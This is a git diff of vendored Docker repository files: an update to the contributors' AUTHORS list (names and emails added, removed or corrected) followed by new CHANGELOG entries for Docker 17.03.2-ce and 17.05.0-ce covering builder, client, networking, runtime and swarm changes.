-Ray Tsang <saturnism@users.noreply.github.com>
+Ray Tsang <rayt@google.com>
 ReadmeCritic <frankensteinbot@gmail.com>
 Recursive Madman <recursive.madman@gmx.de>
+Reficul <xuzhenglun@gmail.com>
 Regan McCooey <rmccooey27@aol.com>
 Remi Rampin <remirampin@gmail.com>
+Remy Suen <remy.suen@gmail.com>
 Renato Riccieri Santos Zannon <renato.riccieri@gmail.com>
-resouer <resouer@163.com>
-rgstephens <greg@udon.org>
+Renaud Gaubert <rgaubert@nvidia.com>
 Rhys Hiltner <rhys@twitch.tv>
+Ri Xu <xuri.me@gmail.com>
+Ricardo N Feliciano <FelicianoTech@gmail.com>
 Rich Moyse <rich@moyse.us>
 Rich Seymour <rseymour@gmail.com>
 Richard <richard.scothern@gmail.com>
@@ -1255,10 +1508,12 @@ Rob Vesse <rvesse@dotnetrdf.org>
 Robert Bachmann <rb@robertbachmann.at>
 Robert Bittle <guywithnose@gmail.com>
 Robert Obryk <robryk@gmail.com>
+Robert Schneider <mail@shakeme.info>
 Robert Stern <lexandro2000@gmail.com>
-Robert Terhaar <robbyt@users.noreply.github.com>
+Robert Terhaar <rterhaar@atlanticdynamic.com>
 Robert Wallis <smilingrob@gmail.com>
 Roberto G. Hashioka <roberto.hashioka@docker.com>
+Roberto Muñoz Fernández <robertomf@gmail.com>
 Robin Naundorf <r.naundorf@fh-muenster.de>
 Robin Schneider <ypid@riseup.net>
 Robin Speekenbrink <robin@kingsquare.nl>
@@ -1269,15 +1524,16 @@ Roel Van Nyen <roel.vannyen@gmail.com>
 Roger Peppe <rogpeppe@gmail.com>
 Rohit Jnagal <jnagal@google.com>
 Rohit Kadam <rohit.d.kadam@gmail.com>
+Rojin George <rojingeorge@huawei.com>
 Roland Huß <roland@jolokia.org>
 Roland Kammerer <roland.kammerer@linbit.com>
 Roland Moriz <rmoriz@users.noreply.github.com>
 Roma Sokolov <sokolov.r.v@gmail.com>
+Roman Dudin <katrmr@gmail.com>
 Roman Strashkin <roman.strashkin@gmail.com>
 Ron Smits <ron.smits@gmail.com>
 Ron Williams <ron.a.williams@gmail.com>
 root <docker-dummy@example.com>
-root <root@localhost>
 root <root@lxdebmas.marist.edu>
 root <root@ubuntu-14.04-amd64-vbox>
 root <root@webm215.cluster016.ha.ovh.net>
@@ -1285,22 +1541,28 @@ Rory Hunter <roryhunter2@gmail.com>
 Rory McCune <raesene@gmail.com>
 Ross Boucher <rboucher@gmail.com>
 Rovanion Luckey <rovanion.luckey@gmail.com>
+Royce Remer <royceremer@gmail.com>
 Rozhnov Alexandr <nox73@ya.ru>
-rsmoorthy <rsmoorthy@users.noreply.github.com>
 Rudolph Gottesheim <r.gottesheim@loot.at>
 Rui Lopes <rgl@ruilopes.com>
 Runshen Zhu <runshen.zhu@gmail.com>
+Ryan Abrams <rdabrams@gmail.com>
 Ryan Anderson <anderson.ryanc@gmail.com>
 Ryan Aslett <github@mixologic.com>
 Ryan Belgrave <rmb1993@gmail.com>
 Ryan Detzel <ryan.detzel@gmail.com>
 Ryan Fowler <rwfowler@gmail.com>
+Ryan Liu <ryanlyy@me.com>
 Ryan McLaughlin <rmclaughlin@insidesales.com>
 Ryan O'Donnell <odonnellryanc@gmail.com>
 Ryan Seto <ryanseto@yak.net>
+Ryan Simmen <ryan.simmen@gmail.com>
+Ryan Stelly <ryan.stelly@live.com>
 Ryan Thomas <rthomas@atlassian.com>
 Ryan Trauntvein <rtrauntvein@novacoast.com>
 Ryan Wallner <ryan.wallner@clusterhq.com>
+Ryan Zhang <ryan.zhang@docker.com>
+ryancooper7 <ryan.cooper7@gmail.com>
 RyanDeng <sheldon.d1018@gmail.com>
 Rémy Greinhofer <remy.greinhofer@livelovely.com>
 s. rannou <mxs@sbrk.org>
@@ -1309,7 +1571,7 @@ Sabin Basyal <sabin.basyal@gmail.com>
 Sachin Joshi <sachin_jayant_joshi@hotmail.com>
 Sagar Hani <sagarhani33@gmail.com>
 Sainath Grandhi <sainath.grandhi@intel.com>
-sakeven <jc5930@sina.cn>
+Sakeven Jiang <jc5930@sina.cn>
 Sally O'Malley <somalley@redhat.com>
 Sam Abed <sam.abed@gmail.com>
 Sam Alba <sam.alba@gmail.com>
@@ -1324,15 +1586,16 @@ Samuel Andaya <samuel@andaya.net>
 Samuel Dion-Girardeau <samuel.diongirardeau@gmail.com>
 Samuel Karp <skarp@amazon.com>
 Samuel PHAN <samuel-phan@users.noreply.github.com>
+Sandeep Bansal <sabansal@microsoft.com>
 Sankar சங்கர் <sankar.curiosity@gmail.com>
 Sanket Saurav <sanketsaurav@gmail.com>
 Santhosh Manohar <santhosh@docker.com>
 sapphiredev <se.imas.kr@gmail.com>
+Sargun Dhillon <sargun@netflix.com>
+Sascha Andres <sascha.andres@outlook.com>
 Satnam Singh <satnam@raintown.org>
-satoru <satorulogic@gmail.com>
 Satoshi Amemiya <satoshi_amemiya@voyagegroup.com>
 Satoshi Tagomori <tagomoris@gmail.com>
-scaleoutsean <scaleoutsean@users.noreply.github.com>
 Scott Bessler <scottbessler@gmail.com>
 Scott Collier <emailscottcollier@gmail.com>
 Scott Johnston <scott@docker.com>
@@ -1341,8 +1604,11 @@ Scott Walls <sawalls@umich.edu>
 sdreyesg <sdreyesg@gmail.com>
 Sean Christopherson <sean.j.christopherson@intel.com>
 Sean Cronin <seancron@gmail.com>
+Sean Lee <seanlee@tw.ibm.com>
+Sean McIntyre <s.mcintyre@xverba.ca>
 Sean OMeara <sean@chef.io>
 Sean P. Kane <skane@newrelic.com>
+Sean Rodman <srodman7689@gmail.com>
 Sebastiaan van Steenis <mail@superseb.nl>
 Sebastiaan van Stijn <github@gone.nl>
 Senthil Kumar Selvaraj <senthil.thecoder@gmail.com>
@@ -1352,20 +1618,24 @@ Seongyeol Lim <seongyeol37@gmail.com>
 Serge Hallyn <serge.hallyn@ubuntu.com>
 Sergey Alekseev <sergey.alekseev.minsk@gmail.com>
 Sergey Evstifeev <sergey.evstifeev@gmail.com>
+Sergii Kabashniuk <skabashnyuk@codenvy.com>
 Serhat Gülçiçek <serhat25@gmail.com>
 Sevki Hasirci <s@sevki.org>
 Shane Canon <scanon@lbl.gov>
 Shane da Silva <shane@dasilva.io>
+Shaun Kaasten <shaunk@gmail.com>
 shaunol <shaunol@gmail.com>
 Shawn Landden <shawn@churchofgit.com>
 Shawn Siefkas <shawn.siefkas@meredith.com>
 shawnhe <shawnhe@shawnhedeMacBook-Pro.local>
+Shayne Wang <shaynexwang@gmail.com>
 Shekhar Gulati <shekhargulati84@gmail.com>
 Sheng Yang <sheng@yasker.org>
 Shengbo Song <thomassong@tencent.com>
 Shev Yan <yandong_8212@163.com>
 Shih-Yuan Lee <fourdollars@gmail.com>
 Shijiang Wei <mountkin@gmail.com>
+Shijun Qin <qinshijun16@mails.ucas.ac.cn>
 Shishir Mahajan <shishir.mahajan@redhat.com>
 Shoubhik Bose <sbose78@gmail.com>
 Shourya Sarcar <shourya.sarcar@gmail.com>
@@ -1373,15 +1643,19 @@ shuai-z <zs.broccoli@gmail.com>
 Shukui Yang <yangshukui@huawei.com>
 Shuwei Hao <haosw@cn.ibm.com>
 Sian Lerk Lau <kiawin@gmail.com>
+Sidhartha Mani <sidharthamn@gmail.com>
 sidharthamani <sid@rancher.com>
 Silas Sewell <silas@sewell.org>
+Silvan Jegen <s.jegen@gmail.com>
 Simei He <hesimei@zju.edu.cn>
 Simon Eskildsen <sirup@sirupsen.com>
+Simon Ferquel <simon.ferquel@docker.com>
 Simon Leinen <simon.leinen@gmail.com>
+Simon Menke <simon.menke@gmail.com>
 Simon Taranto <simon.taranto@gmail.com>
+Simon Vikstrom <pullreq@devsn.se>
 Sindhu S <sindhus@live.in>
 Sjoerd Langkemper <sjoerd-github@linuxonly.nl>
-skaasten <shaunk@gmail.com>
 Solganik Alexander <solganik@gmail.com>
 Solomon Hykes <solomon@docker.com>
 Song Gao <song@gao.io>
@@ -1392,41 +1666,52 @@ Spencer Smith <robertspencersmith@gmail.com>
 Sridatta Thatipamala <sthatipamala@gmail.com>
 Sridhar Ratnakumar <sridharr@activestate.com>
 Srini Brahmaroutu <srbrahma@us.ibm.com>
-srinsriv <srinsriv@users.noreply.github.com>
+Srinivasan Srivatsan <srinivasan.srivatsan@hpe.com>
+Stanislav Bondarenko <stanislav.bondarenko@gmail.com>
 Steeve Morin <steeve.morin@gmail.com>
 Stefan Berger <stefanb@linux.vnet.ibm.com>
 Stefan J. Wernli <swernli@microsoft.com>
 Stefan Praszalowicz <stefan@greplin.com>
+Stefan S. <tronicum@user.github.com>
 Stefan Scherer <scherer_stefan@icloud.com>
 Stefan Staudenmeyer <doerte@instana.com>
 Stefan Weil <sw@weilnetz.de>
+Stephan Spindler <shutefan@gmail.com>
 Stephen Crosby <stevecrozz@gmail.com>
 Stephen Day <stephen.day@docker.com>
 Stephen Drake <stephen@xenolith.net>
 Stephen Rust <srust@blockbridge.com>
+Steve Desmond <steve@vtsv.ca>
+Steve Dougherty <steve@asksteved.com>
 Steve Durrheimer <s.durrheimer@gmail.com>
 Steve Francia <steve.francia@gmail.com>
 Steve Koch <stevekochscience@gmail.com>
 Steven Burgess <steven.a.burgess@hotmail.com>
 Steven Erenst <stevenerenst@gmail.com>
+Steven Hartland <steven.hartland@multiplay.co.uk>
 Steven Iveson <sjiveson@outlook.com>
 Steven Merrill <steven.merrill@gmail.com>
 Steven Richards <steven@axiomzen.co>
 Steven Taylor <steven.taylor@me.com>
 Subhajit Ghosh <isubuz.g@gmail.com>
 Sujith Haridasan <sujith.h@gmail.com>
+Sun Gengze <690388648@qq.com>
+Sun Jianbo <wonderflow.sun@gmail.com>
+Sunny Gogoi <indiasuny000@gmail.com>
 Suryakumar Sudar <surya.trunks@gmail.com>
 Sven Dowideit <SvenDowideit@home.org.au>
 Swapnil Daingade <swapnil.daingade@gmail.com>
 Sylvain Baubeau <sbaubeau@redhat.com>
 Sylvain Bellemare <sylvain@ascribe.io>
 Sébastien <sebastien@yoozio.com>
+Sébastien HOUZÉ <cto@verylastroom.com>
 Sébastien Luttringer <seblu@seblu.net>
 Sébastien Stormacq <sebsto@users.noreply.github.com>
+Tabakhase <mail@tabakhase.com>
 Tadej Janež <tadej.j@nez.si>
 TAGOMORI Satoshi <tagomoris@gmail.com>
 tang0th <tang0th@gmx.com>
-Tangi COLIN <tangicolin@gmail.com>
+Tangi Colin <tangicolin@gmail.com>
 Tatsuki Sugiura <sugi@nemui.org>
 Tatsushi Inagaki <e29253@jp.ibm.com>
 Taylor Jones <monitorjbl@gmail.com>
@@ -1447,7 +1732,7 @@ Thomas Gazagnaire <thomas@gazagnaire.org>
 Thomas Grainger <tagrain@gmail.com>
 Thomas Hansen <thomas.hansen@gmail.com>
 Thomas Leonard <thomas.leonard@docker.com>
-Thomas LEVEIL <thomasleveil@gmail.com>
+Thomas Léveil <thomasleveil@gmail.com>
 Thomas Orozco <thomas@orozco.fr>
 Thomas Riccardi <riccardi@systran.fr>
 Thomas Schroeter <thomas@cliqz.com>
@@ -1455,21 +1740,25 @@ Thomas Sjögren <konstruktoid@users.noreply.github.com>
 Thomas Swift <tgs242@gmail.com>
 Thomas Tanaka <thomas.tanaka@oracle.com>
 Thomas Texier <sharkone@en-mousse.org>
+Ti Zhou <tizhou1986@gmail.com>
 Tianon Gravi <admwiggin@gmail.com>
 Tianyi Wang <capkurmagati@gmail.com>
 Tibor Vass <teabee89@gmail.com>
 Tiffany Jernigan <tiffany.f.j@gmail.com>
 Tiffany Low <tiffany@box.com>
+Tim Bart <tim@fewagainstmany.com>
 Tim Bosse <taim@bosboot.org>
 Tim Dettrick <t.dettrick@uq.edu.au>
 Tim Düsterhus <tim@bastelstu.be>
 Tim Hockin <thockin@google.com>
+Tim Potter <tpot@hpe.com>
 Tim Ruffles <oi@truffles.me.uk>
 Tim Smith <timbot@google.com>
 Tim Terhorst <mynamewastaken+git@gmail.com>
 Tim Wang <timwangdev@gmail.com>
 Tim Waugh <twaugh@redhat.com>
 Tim Wraight <tim.wraight@tangentlabs.co.uk>
+Tim Zju <21651152@zju.edu.cn>
 timfeirg <kkcocogogo@gmail.com>
 Timothy Hobbs <timothyhobbs@seznam.cz>
 tjwebb123 <tjwebb123@users.noreply.github.com>
@@ -1486,11 +1775,14 @@ Todd Lunter <tlunter@gmail.com>
 Todd Whiteman <todd.whiteman@joyent.com>
 Toli Kuznets <toli@docker.com>
 Tom Barlow <tomwbarlow@gmail.com>
+Tom Booth <tombooth@gmail.com>
 Tom Denham <tom@tomdee.co.uk>
 Tom Fotherby <tom+github@peopleperhour.com>
 Tom Howe <tom.howe@enstratius.com>
 Tom Hulihan <hulihan.tom159@gmail.com>
 Tom Maaswinkel <tom.maaswinkel@12wiki.eu>
+Tom Sweeney <tsweeney@redhat.com>
+Tom Wilkie <tom.wilkie@gmail.com>
 Tom X. Tobin <tomxtobin@tomxtobin.com>
 Tomas Tomecek <ttomecek@redhat.com>
 Tomasz Kopczynski <tomek@kopczynski.net.pl>
@@ -1498,31 +1790,36 @@ Tomasz Lipinski <tlipinski@users.noreply.github.com>
 Tomasz Nurkiewicz <nurkiewicz@gmail.com>
 Tommaso Visconti <tommaso.visconti@gmail.com>
 Tomáš Hrčka <thrcka@redhat.com>
-Tonis Tiigi <tonistiigi@gmail.com>
 Tonny Xu <tonny.xu@gmail.com>
+Tony Abboud <tdabboud@hotmail.com>
 Tony Daws <tony@daws.ca>
 Tony Miller <mcfiredrill@gmail.com>
 toogley <toogley@mailbox.org>
 Torstein Husebø <torstein@huseboe.net>
+Tõnis Tiigi <tonistiigi@gmail.com>
 tpng <benny.tpng@gmail.com>
 tracylihui <793912329@qq.com>
+Trapier Marshall <trapier.marshall@docker.com>
 Travis Cline <travis.cline@gmail.com>
 Travis Thieman <travis.thieman@gmail.com>
 Trent Ogren <tedwardo2@gmail.com>
 Trevor <trevinwoodstock@gmail.com>
 Trevor Pounds <trevor.pounds@gmail.com>
-trishnaguha <trishnaguha17@gmail.com>
+Trevor Sullivan <pcgeek86@gmail.com>
+Trishna Guha <trishnaguha17@gmail.com>
 Tristan Carel <tristan@cogniteev.com>
 Troy Denton <trdenton@gmail.com>
+Tycho Andersen <tycho@docker.com>
 Tyler Brock <tyler.brock@gmail.com>
 Tzu-Jung Lee <roylee17@gmail.com>
-Tõnis Tiigi <tonistiigi@gmail.com>
+uhayate <uhayate.gong@daocloud.io>
 Ulysse Carion <ulyssecarion@gmail.com>
-unknown <sebastiaan@ws-key-sebas3.dpi1.dpi>
+Umesh Yadav <umesh4257@gmail.com>
+Utz Bacher <utz.bacher@de.ibm.com>
 vagrant <vagrant@ubuntu-14.04-amd64-vbox>
 Vaidas Jablonskis <jablonskis@gmail.com>
+vanderliang <lansheng@meili-inc.com>
 Veres Lajos <vlajos@gmail.com>
-vgeta <gopikannan.venugopalsamy@gmail.com>
 Victor Algaze <valgaze@gmail.com>
 Victor Coisne <victor.coisne@dotcloud.com>
 Victor Costan <costan@gmail.com>
@@ -1537,15 +1834,15 @@ Viktor Stanchev <me@viktorstanchev.com>
 Viktor Vojnovski <viktor.vojnovski@amadeus.com>
 VinayRaghavanKS <raghavan.vinay@gmail.com>
 Vincent Batts <vbatts@redhat.com>
-Vincent Bernat <bernat@luffy.cx>
 Vincent Bernat <Vincent.Bernat@exoscale.ch>
-Vincent Demeester <vincent@sbr.pm>
+Vincent Demeester <vincent.demeester@docker.com>
 Vincent Giersch <vincent.giersch@ovh.net>
 Vincent Mayers <vincent.mayers@inbloom.org>
 Vincent Woo <me@vincentwoo.com>
 Vinod Kulkarni <vinod.kulkarni@gmail.com>
 Vishal Doshi <vishal.doshi@gmail.com>
 Vishnu Kannan <vishnuk@google.com>
+Vitaly Ostrosablin <vostrosablin@virtuozzo.com>
 Vitor Monteiro <vmrmonteiro@gmail.com>
 Vivek Agarwal <me@vivek.im>
 Vivek Dasgupta <vdasgupt@redhat.com>
@@ -1556,24 +1853,39 @@ Vladimir Pouzanov <farcaller@google.com>
 Vladimir Rutsky <altsysrq@gmail.com>
 Vladimir Varankin <nek.narqo+git@gmail.com>
 VladimirAus <v_roudakov@yahoo.com>
+Vlastimil Zeman <vlastimil.zeman@diffblue.com>
 Vojtech Vitek (V-Teq) <vvitek@redhat.com>
 waitingkuo <waitingkuo0527@gmail.com>
 Walter Leibbrandt <github@wrl.co.za>
 Walter Stanish <walter@pratyeka.org>
-WANG Chao <wcwxyz@gmail.com>
+Wang Chao <chao.wang@ucloud.cn>
+Wang Guoliang <liangcszzu@163.com>
+Wang Jie <wangjie5@chinaskycloud.com>
+Wang Long <long.wanglong@huawei.com>
+Wang Ping <present.wp@icloud.com>
 Wang Xing <hzwangxing@corp.netease.com>
+Wang Yuexiao <wang.yuexiao@zte.com.cn>
 Ward Vandewege <ward@jhvc.com>
 WarheadsSE <max@warheads.net>
+Wassim Dhif <wassimdhif@gmail.com>
 Wayne Chang <wayne@neverfear.org>
+Wayne Song <wsong@docker.com>
+Weerasak Chongnguluam <singpor@gmail.com>
+Wei Wu <wuwei4455@gmail.com>
 Wei-Ting Kuo <waitingkuo0527@gmail.com>
+weipeng <weipeng@tuscloud.io>
 weiyan <weiyan3@huawei.com>
 Weiyang Zhu <cnresonant@gmail.com>
 Wen Cheng Ma <wenchma@cn.ibm.com>
 Wendel Fleming <wfleming@usc.edu>
+Wenjun Tang <tangwj2@lenovo.com>
 Wenkai Yin <yinw@vmware.com>
+Wentao Zhang <zhangwentao234@huawei.com>
 Wenxuan Zhao <viz@linux.com>
 Wenyu You <21551128@zju.edu.cn>
+Wenzhi Liang <wenzhi.liang@gmail.com>
 Wes Morgan <cap10morgan@gmail.com>
+Wewang Xiaorenfine <wang.xiaoren@zte.com.cn>
 Will Dietz <w@wdtz.org>
 Will Rouesnel <w.rouesnel@gmail.com>
 Will Weaver <monkey@buildingbananas.com>
@@ -1581,49 +1893,60 @@ willhf <willhf@gmail.com>
 William Delanoue <william.delanoue@gmail.com>
 William Henry <whenry@redhat.com>
 William Hubbs <w.d.hubbs@gmail.com>
+William Martin <wmartin@pivotal.io>
 William Riancho <wr.wllm@gmail.com>
 William Thurston <thurstw@amazon.com>
 WiseTrem <shepelyov.g@gmail.com>
-wlan0 <sidharthamn@gmail.com>
 Wolfgang Powisch <powo@powo.priv.at>
-wonderflow <wonderflow.sun@gmail.com>
 Wonjun Kim <wonjun.kim@navercorp.com>
 xamyzhao <x.amy.zhao@gmail.com>
+Xianglin Gao <xlgao@zju.edu.cn>
 Xianlu Bird <xianlubird@gmail.com>
 XiaoBing Jiang <s7v7nislands@gmail.com>
 Xiaoxu Chen <chenxiaoxu14@otcaix.iscas.ac.cn>
+Xiaoyu Zhang <zhang.xiaoyu33@zte.com.cn>
 xiekeyang <xiekeyang@huawei.com>
+Xinbo Weng <xihuanbo_0521@zju.edu.cn>
 Xinzi Zhou <imdreamrunner@gmail.com>
 Xiuming Chen <cc@cxm.cc>
-xlgao-zju <xlgao@zju.edu.cn>
+Xuecong Liao <satorulogic@gmail.com>
 xuzhaokui <cynicholas@gmail.com>
 Yahya <ya7yaz@gmail.com>
 YAMADA Tsuyoshi <tyamada@minimum2scp.org>
+Yamasaki Masahide <masahide.y@gmail.com>
 Yan Feng <yanfeng2@huawei.com>
 Yang Bai <hamo.by@gmail.com>
-yangshukui <yangshukui@huawei.com>
+Yang Pengfei <yangpengfei4@huawei.com>
+yangchenliang <yangchenliang@huawei.com>
 Yanqiang Miao <miao.yanqiang@zte.com.cn>
+Yao Zaiyong <yaozaiyong@hotmail.com>
+Yassine Tijani <yasstij11@gmail.com>
 Yasunori Mahata <nori@mahata.net>
+Yazhong Liu <yorkiefixer@gmail.com>
 Yestin Sun <sunyi0804@gmail.com>
 Yi EungJun <eungjun.yi@navercorp.com>
 Yibai Zhang <xm1994@gmail.com>
 Yihang Ho <hoyihang5@gmail.com>
-Ying Li <cyli@twistedmatrix.com>
+Ying Li <ying.li@docker.com>
 Yohei Ueda <yohei@jp.ibm.com>
 Yong Tang <yong.tang.github@outlook.com>
 Yongzhi Pan <panyongzhi@gmail.com>
-yorkie <yorkiefixer@gmail.com>
+Yosef Fertel <yfertel@gmail.com>
+You-Sheng Yang (楊有勝) <vicamo@gmail.com>
 Youcef YEKHLEF <yyekhlef@gmail.com>
+Yu Changchun <yuchangchun1@huawei.com>
+Yu Chengxia <yuchengxia@huawei.com>
+Yu Peng <yu.peng36@zte.com.cn>
+Yu-Ju Hong <yjhong@google.com>
 Yuan Sun <sunyuan3@huawei.com>
-yuchangchun <yuchangchun1@huawei.com>
-yuchengxia <yuchengxia@huawei.com>
-yuexiao-wang <wang.yuexiao@zte.com.cn>
-YuPengZTE <yu.peng36@zte.com.cn>
+Yuanhong Peng <pengyuanhong@huawei.com>
+Yuhao Fang <fangyuhao@gmail.com>
+Yunxiang Huang <hyxqshk@vip.qq.com>
 Yurii Rashkovskii <yrashk@gmail.com>
-yuzou <zouyu7@huawei.com>
+Yves Junqueira <yves.junqueira@gmail.com>
 Zac Dover <zdover@redhat.com>
 Zach Borboa <zachborboa@gmail.com>
-Zachary Jaffee <zij@case.edu>
+Zachary Jaffee <zjaffee@us.ibm.com>
 Zain Memon <zain@inzain.net>
 Zaiste! <oh@zaiste.net>
 Zane DeGraffenried <zane.deg@gmail.com>
@@ -1632,9 +1955,14 @@ Zen Lin(Zhinan Lin) <linzhinan@huawei.com>
 Zhang Kun <zkazure@gmail.com>
 Zhang Wei <zhangwei555@huawei.com>
 Zhang Wentao <zhangwentao234@huawei.com>
+ZhangHang <stevezhang2014@gmail.com>
+zhangxianwei <xianwei.zw@alibaba-inc.com>
 Zhenan Ye <21551168@zju.edu.cn>
-zhouhao <zhouhao@cn.fujitsu.com>
+zhenghenghuo <zhenghenghuo@zju.edu.cn>
+Zhenkun Bi <bi.zhenkun@zte.com.cn>
+Zhou Hao <zhouhao@cn.fujitsu.com>
 Zhu Guihua <zhugh.fnst@cn.fujitsu.com>
+Zhu Kunjia <zhu.kunjia@zte.com.cn>
 Zhuoyun Wei <wzyboy@wzyboy.org>
 Zilin Du <zilin.du@gmail.com>
 zimbatm <zimbatm@zimbatm.com>
@@ -1642,6 +1970,7 @@ Ziming Dong <bnudzm@foxmail.com>
 ZJUshuaizhou <21551191@zju.edu.cn>
 zmarouf <zeid.marouf@gmail.com>
 Zoltan Tombol <zoltan.tombol@gmail.com>
+Zou Yu <zouyu7@huawei.com>
 zqh <zqhxuyuan@gmail.com>
 Zuhayr Elahi <elahi.zuhayr@gmail.com>
 Zunayed Ali <zunayed@gmail.com>
@@ -1649,4 +1978,7 @@ Zunayed Ali <zunayed@gmail.com>
 Álvaro Lázaro <alvaro.lazaro.g@gmail.com>
 Átila Camurça Alves <camurca.home@gmail.com>
 尹吉峰 <jifeng.yin@gmail.com>
+徐俊杰 <paco.xu@daocloud.io>
+慕陶 <jihui.xjh@alibaba-inc.com>
 搏通 <yufeng.pyf@alibaba-inc.com>
+黄艳红00139573 <huang.yanhong@zte.com.cn>
diff --git a/vendor/github.com/docker/docker/CHANGELOG.md b/vendor/github.com/docker/docker/CHANGELOG.md
index 36bb880639..fec9269b79 100644
--- a/vendor/github.com/docker/docker/CHANGELOG.md
+++ b/vendor/github.com/docker/docker/CHANGELOG.md
@@ -5,6 +5,277 @@ information on the list of deprecated flags and APIs please have a look at
 https://docs.docker.com/engine/deprecated/ where target removal dates can also
 be found.
 
+## 17.03.2-ce (2017-05-29)
+
+### Networking
+
+- Fix a concurrency issue preventing network creation [#33273](https://github.com/moby/moby/pull/33273)
+
+### Runtime
+
+- Relabel secrets path to avoid a Permission Denied on selinux enabled systems [#33236](https://github.com/moby/moby/pull/33236) (ref [#32529](https://github.com/moby/moby/pull/32529)
+- Fix cases where local volume were not properly relabeled if needed [#33236](https://github.com/moby/moby/pull/33236) (ref [#29428](https://github.com/moby/moby/pull/29428))
+- Fix an issue while upgrading if a plugin rootfs was still mounted [#33236](https://github.com/moby/moby/pull/33236) (ref [#32525](https://github.com/moby/moby/pull/32525))
+- Fix an issue where volume wouldn't default to the `rprivate` propagation mode [#33236](https://github.com/moby/moby/pull/33236) (ref [#32851](https://github.com/moby/moby/pull/32851))
+- Fix a panic that could occur when a volume driver could not be retrieved [#33236](https://github.com/moby/moby/pull/33236) (ref [#32347](https://github.com/moby/moby/pull/32347))
++ Add a warning in `docker info` when the `overlay` or `overlay2` graphdriver is used on a filesystem without `d_type` support [#33236](https://github.com/moby/moby/pull/33236) (ref [#31290](https://github.com/moby/moby/pull/31290))
+- Fix an issue with backporting mount spec to older volumes [#33207](https://github.com/moby/moby/pull/33207)
+- Fix issue where a failed unmount can lead to data loss on local volume remove [#33120](https://github.com/moby/moby/pull/33120)
+
+### Swarm Mode
+
+- Fix a case where tasks could get killed unexpectedly [#33118](https://github.com/moby/moby/pull/33118)
+- Fix an issue preventing to deploy services if the registry cannot be reached despite the needed images being locally present [#33117](https://github.com/moby/moby/pull/33117)
+
+## 17.05.0-ce (2017-05-04)
+
+### Builder
+
++ Add multi-stage build support [#31257](https://github.com/docker/docker/pull/31257) [#32063](https://github.com/docker/docker/pull/32063)
++ Allow using build-time args (`ARG`) in `FROM` [#31352](https://github.com/docker/docker/pull/31352)
++ Add an option for specifying build target [#32496](https://github.com/docker/docker/pull/32496)
+* Accept `-f -` to read Dockerfile from `stdin`, but use local context for building [#31236](https://github.com/docker/docker/pull/31236)
+* The values of default build time arguments (e.g `HTTP_PROXY`) are no longer displayed in docker image history unless a corresponding `ARG` instruction is written in the Dockerfile. [#31584](https://github.com/docker/docker/pull/31584)
+- Fix setting command if a custom shell is used in a parent image [#32236](https://github.com/docker/docker/pull/32236)
+- Fix `docker build --label` when the label includes single quotes and a space [#31750](https://github.com/docker/docker/pull/31750)
+
+### Client
+
+* Add `--mount` flag to `docker run` and `docker create` [#32251](https://github.com/docker/docker/pull/32251)
+* Add `--type=secret` to `docker inspect` [#32124](https://github.com/docker/docker/pull/32124)
+* Add `--format` option to `docker secret ls` [#31552](https://github.com/docker/docker/pull/31552)
+* Add `--filter` option to `docker secret ls` [#30810](https://github.com/docker/docker/pull/30810)
+* Add `--filter scope=<swarm|local>` to `docker network ls` [#31529](https://github.com/docker/docker/pull/31529)
+* Add `--cpus` support to `docker update` [#31148](https://github.com/docker/docker/pull/31148)
+* Add label filter to `docker system prune` and other `prune` commands [#30740](https://github.com/docker/docker/pull/30740)
+* `docker stack rm` now accepts multiple stacks as input [#32110](https://github.com/docker/docker/pull/32110)
+* Improve `docker version --format` option when the client has downgraded the API version [#31022](https://github.com/docker/docker/pull/31022)
+* Prompt when using an encrypted client certificate to connect to a docker daemon [#31364](https://github.com/docker/docker/pull/31364)
+* Display created tags on successful `docker build` [#32077](https://github.com/docker/docker/pull/32077)
+* Cleanup compose convert error messages [#32087](https://github.com/moby/moby/pull/32087)
+
+### Contrib
+
++ Add support for building docker debs for Ubuntu 17.04 Zesty on amd64 [#32435](https://github.com/docker/docker/pull/32435)
+
+### Daemon
+
+- Fix `--api-cors-header` being ignored if `--api-enable-cors` is not set [#32174](https://github.com/docker/docker/pull/32174)
+- Cleanup docker tmp dir on start [#31741](https://github.com/docker/docker/pull/31741)
+- Deprecate `--graph` flag in favor or `--data-root`  [#28696](https://github.com/docker/docker/pull/28696)
+
+### Logging
+
++ Add support for logging driver plugins [#28403](https://github.com/docker/docker/pull/28403)
+* Add support for showing logs of individual tasks to `docker service logs`, and add `/task/{id}/logs` REST endpoint [#32015](https://github.com/docker/docker/pull/32015)
+* Add `--log-opt env-regex` option to match environment variables using a regular expression [#27565](https://github.com/docker/docker/pull/27565)
+
+### Networking
+
++ Allow user to replace, and customize the ingress network [#31714](https://github.com/docker/docker/pull/31714)
+- Fix UDP traffic in containers not working after the container is restarted [#32505](https://github.com/docker/docker/pull/32505)
+- Fix files being written to `/var/lib/docker` if a different data-root is set [#32505](https://github.com/docker/docker/pull/32505)
+
+### Runtime
+
+- Ensure health probe is stopped when a container exits [#32274](https://github.com/docker/docker/pull/32274)
+
+### Swarm Mode
+
++ Add update/rollback order for services (`--update-order` / `--rollback-order`) [#30261](https://github.com/docker/docker/pull/30261)
++ Add support for synchronous `service create` and `service update` [#31144](https://github.com/docker/docker/pull/31144)
++ Add support for "grace periods" on healthchecks through the `HEALTHCHECK --start-period` and `--health-start-period` flag to
+  `docker service create`, `docker service update`, `docker create`, and `docker run` to support containers with an initial startup
+  time [#28938](https://github.com/docker/docker/pull/28938)
+* `docker service create` now omits fields that are not specified by the user, when possible. This will allow defaults to be applied inside the manager [#32284](https://github.com/docker/docker/pull/32284)
+* `docker service inspect` now shows default values for fields that are not specified by the user [#32284](https://github.com/docker/docker/pull/32284)
+* Move `docker service logs` out of experimental [#32462](https://github.com/docker/docker/pull/32462)
+* Add support for Credential Spec and SELinux to services to the API [#32339](https://github.com/docker/docker/pull/32339)
+* Add `--entrypoint` flag to `docker service create` and `docker service update` [#29228](https://github.com/docker/docker/pull/29228)
+* Add `--network-add` and `--network-rm` to `docker service update` [#32062](https://github.com/docker/docker/pull/32062)
+* Add `--credential-spec` flag to `docker service create` and `docker service update` [#32339](https://github.com/docker/docker/pull/32339)
+* Add `--filter mode=<global|replicated>` to `docker service ls` [#31538](https://github.com/docker/docker/pull/31538)
+* Resolve network IDs on the client side, instead of in the daemon when creating services [#32062](https://github.com/docker/docker/pull/32062)
+* Add `--format` option to `docker node ls` [#30424](https://github.com/docker/docker/pull/30424)
+* Add `--prune` option to `docker stack deploy` to remove services that are no longer defined in the docker-compose file [#31302](https://github.com/docker/docker/pull/31302)
+* Add `PORTS` column for `docker service ls` when using `ingress` mode [#30813](https://github.com/docker/docker/pull/30813)
